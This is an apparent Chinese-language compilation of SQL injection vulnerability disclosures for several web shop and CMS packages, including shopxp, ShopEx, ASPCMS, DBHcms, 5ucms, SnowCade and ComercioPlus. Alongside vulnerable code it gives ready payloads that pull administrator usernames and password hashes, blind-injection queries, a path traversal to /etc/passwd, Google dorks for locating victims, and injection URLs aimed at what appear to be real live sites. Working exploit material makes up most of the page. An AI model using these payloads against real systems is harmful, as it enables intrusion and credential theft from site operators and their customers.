下面小编给大家整理的shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警(共含10篇),希望大家喜欢!同时,但愿您也能像本文投稿人“睡不醒的冰西瓜”一样,积极向本站投稿分享好文章。
漏洞作者:zpino
漏洞存在于/admin/pinglun.asp 文件
<%=webname%>--用户评论
<%dim shopxpptid,action
pinglunid=request.QueryString(“id”)
action=request.QueryString(“action”)
if action=“save” then
set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
rs(“huifu”)=HTMLEncode2(trim(request(“huifu”)))
rs(“huifudate”)=now
rs.update
rs.close
set rs=nothing
…………………/*省略*/…………………..
<%set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
%>
首先看到
<%
dim conn,connstr,db
startime=timer()
db=“../shopxp/”&dataname&“” '数据库
on error resume next '尝试连数据库,一直到超时,但可以加强SQL注入过滤
connstr = “Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & Server.MapPath(db)
'connstr=“DBQ=”+server.mappath(“”&db&“”)+“;DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};”
set conn=server.createobject(“ADODB.CONNECTION”)
conn.open connstr
%>
这个文件的作用是获取数据库连接对象,继续回到/admin/pinglun.asp 文件,
pinglunid=request.QueryString(“id”)
action=request.QueryString(“action”)
获取id的值赋给pinglunid,跟进pinglunid,走到
<%set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from shopxp_pinglun where pinglunid=”&pinglunid,conn,1,3
%>
可以看到没有过滤就被带入到数据库,接下来在下面打印出了查询结果,导致一个SQL漏洞注入产生,
shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
,
又是sql注入
测试版本:shopex-singel-4.8.5.78660
文件\core\shop\controller\ctl.tools.php
function products(){ $objGoods = &$this->system->loadModel('goods/products'); $filter = array(); foreach(explode(',',$_POST['goods']) as $gid){$filter['goods_id'][] = $gid; } $this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,“'.$_POST['goods'].'”) as rank',$filter,0,-1,array('rank','asc'));
目测$_POST['goods']直接进入到sql语句中,由于部分文件加密开启sql语句执行记录日志
提交:
goods=aaa“) FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23 130526 20:03:23 352 Connect root@localhost on 352 Init DB shopex 352 Query SET NAMES 'utf8' 352 Query SELECT * FROM sdb_plugins WHERE plugin_type=”app“ 352 Query select * from sdb_plugins where plugin_type=”app“ and plugin_ident='commodity_radar' LIMIT 0, 1 352 Query select * from sdb_plugins where plugin_type=”app“ and plugin_ident='shopex_stat' LIMIT 0, 1 352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc 352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,”aaa“) FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#”) as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615
查看日志变量已经进入到sql语句中
又是sql注入漏洞 测试版本:shopex-singel-4.8.5.78660
文件:\core\shop\controller\ctl.member.php
function delTrackMsg { if(!empty($_POST['deltrack'])){ $oMsg = &$this->system->loadModel('resources/msgbox'); $oMsg->delTrackMsg($_POST['deltrack']); $this->splash('success', $this->system->mkUrl(“member”,“track”), __('删除成功')); }else{ $this->splash('failed', $this->system->mkUrl(“member”,“track”), __('删除失败: 没有选中任何记录!')); } }
跟进$oMsg->delTrackMsg($_POST['deltrack']);
在文件:\core\model_v5\resources\mdl.msgbox.php
public function delTrackMsg( $aMsgId ) { foreach ( $aMsgId as $val ) { if ( $val ) { $aTmp[] = $val; } } if ( $aTmp ) { $this->db->exec( “DELETE FROM sdb_message WHERE msg_id IN (”.implode( “,”, $aTmp ).“) AND del_status='1'” ); $this->db->exec( “UPDATE sdb_message SET del_status='2' WHERE msg_id IN (”.implode( “,”, $aTmp ).“)” ); } return true; }
出现在DELETE语句的sql注入纯粹是体力活,通过是否删除了message作为判断依据慢慢查吧
提交数据包;deltrack[1]=1) and (select count(*) from sdb_operators)=1%23
查看sql执行记录:
130526 20:31:25 360 Connect root@localhost on 360 Init DB shopex 360 Query SET NAMES 'utf8' 360 Query SELECT * FROM sdb_plugins WHERE plugin_type=“app” 360 Query select * from sdb_plugins where plugin_type=“app” and plugin_ident='commodity_radar' LIMIT 0, 1 360 Query select * from sdb_plugins where plugin_type=“app” and plugin_ident='shopex_stat' LIMIT 0, 1 360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1 360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1 360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1 360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
执行成功
漏洞证明:
因为(select count(*) from sdb_operators)=1,所以msg_id=1的记录被删除,
shopex ctl.member.php文件SQL注入漏洞漏洞预警
,
慢慢猜解吧。。。
作者:code_sec
ASPCMS系统对用户提交的参数过滤不严,导致攻击者可以提交SQL语句查询数据库获取敏感信息,
漏洞存在于/admin_aspcms/_content/_Content/AspCms_ContentFun.asp,这个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取的参数没有使用自定义的filterPara函数过滤,导致多处注入,代码入下:
<% ''die debugmode
dim action : action=getForm(“action”,“get”)
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
''SpecCategory用于判断是哪个类型的自定义参数
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
sortType=getForm(“sortType”,“get”) if isnul(sortType) then sortType=0
sortid=getForm(“sortid”,“post”) if isnul(sortid) then sortid=getForm(“sortid”,“get”)
keyword=getForm(“keyword”,“post”) if isnul(keyword) then keyword=getForm(“keyword”,“get”)
page=getForm(“page”,“get”)
psize=getForm(“psize”,“get”)
rder=getForm(“order”,“get”)
rdsc=getForm(“ordsc”,“get”)
DownGroupID=getForm(“DownGroupID”,“post”)
VideoGroupID=getForm(“VideoGroupID”,“post”)
select case sortType
case “2”
sortTypeName =“文章”
SpecCategory = “C” case “3”
sortTypeName =“产品”
SpecCategory = “P” case “4”
sortTypeName =“下载”
SpecCategory = “DL” case “5”
sortTypeName =“招聘”
SpecCategory = “HR” case “6”
sortTypeName =“相册”
SpecCategory = “FO” case “8”
sortTypeName = “视频”
SpecCategory = “VI” end select
''单篇1,文章2,产品3,下载4,招聘5,相册6,链接7,视频8
Select case action
case “add” : addContent
case “edit” : editContent
case “move” : moveContent
case “copy” : copyContent
case “rpost” : rpostContent
case “del” : delContent
case “recovery” : Recovery
case “tdel” : trueDelContent
case “on” : onOff “on”, “Content”, “ContentID”, “ContentStatus”, “”, getPageName()&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
case “off” : onOff “off”, “Content”, “ContentID”, “ContentStatus”, “”, getPageName()&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
case “order” : UpdateOrder
End Select
Sub trueDelContent
dim id : id=getForm(“id”,“both”) if isnul(id) then alertMsgAndGo “请选择要操作的内容”,“-1” if runmode=1 then
dim rs, sql, filepath
dim templateobj : set templateobj=new TemplateClass
sql=“select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID=”&session(“languageID”)&“ and a.SortID=b.SortID and ContentStatus=2 and ContentID in(”&id&“)” set rs=conn.exec(sql,“r1”) do while not rs.eof
filepath=templateobj.getContentLink(rs(“SortID”),rs(“ContentID”),rs(“SortFolder”),rs(“a.GroupID”),rs(“ContentFolder”),
rs(“ContentFileName”),rs(“AddTime”),rs(“PageFileName”),rs(“b.GroupID”)) if isExistFile(filepath) then delFile filepath
''echo filepath&“
”
rs.movenext
loop
end if
conn.exec “delete from {prefix}Content where ContentStatus=2 and ContentID in(”&id&“)”,“exe”
alertMsgAndGo “彻底删除成功”,getPageName()&“?sortType=”&sortType&“&sortid=”&sortid&“&keyword=”&keyword&“&page=”&page&“&psize=”&psize&“&order=”&order&“&ordsc=”&ordsc
End Sub
利用比较简单,利用iif来强制报错:
www.xxx.com0/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
查询管理员用户名第一个字符是否为a
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
查询管理员用户名第一个字符是否为b
返回为假,强制报错
Google之:
intext:powered by Thaiweb
inurl:index.php?page=board.php
利用点1:www.xfack.com/index.php?page=../../../../../../../../../../../../../etc/passwd
利用点2:www.xfack.com/index.php?page=boardque.php&bod_id=4'
www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
ShopEx4.85最新版本SQL注入,无需登录,过GPC,可直接查询管理员密码并回显
啥都不说了,直接上利用代码,将下面的html另存为一个html文件,修改localhost部分为站点的真实地址:
columns:
DBHcms是一个面向个人和小型商业网站的开源内容管理系统,同时开发多种语言版本很好的支持搜索引擎优化,
DBHcms 1.1.4 SQL注入漏洞漏洞预警
,
程序存在漏洞主要原因是未对提交参数进行严格过滤,导致SQL注入攻击漏洞产生。
SQL注入测试代码:
192.168.1.100/DBHcms/index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
漏洞文件:/mobile/index.asp
漏洞说明:未对变量id过滤 导致产生sql注入!
漏洞测试:www.5u.hk/ 官方
漏洞证明↓
漏洞EXP↓
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin
漏洞修复↓
过滤,
5ucms 最新版 sql 注入漏洞漏洞预警
,
。。
放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用
SnowCade v3多处存在SQL注入攻击漏洞,可获取管理员权限
127.0.0.1/index.php?action=browse&cat=[注入语句]
127.0.0.1/index.php?action=playgame&gameid=[注入语句]
127.0.0.1/index.php?action=browse&cat=[注入语句]
列如:127.0.0.1/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
注:作者ahwak
ComercioPlus是一款使用PHP编写的虚拟商店系统,ComercioPlus 5.6版中的pp_productos.php文件存在 SQL注入漏洞,可能导致敏感信息泄露,
[+]info:
~~~~~~~~~
# Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: “ Servicio ofrecido por ComerciosOnLine ”
# Date: 27/01/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: www.comerciosonline.com/index.php?p=8
# Version: All
# Tested on: Linux, Windows
[+]poc:
~~~~~~~~~
localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16060
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
★ eWebeditoR3.8 for php任意文件上传EXP漏洞预警
★ ECSHOP跨站+后台文件包含=Getshell漏洞预警
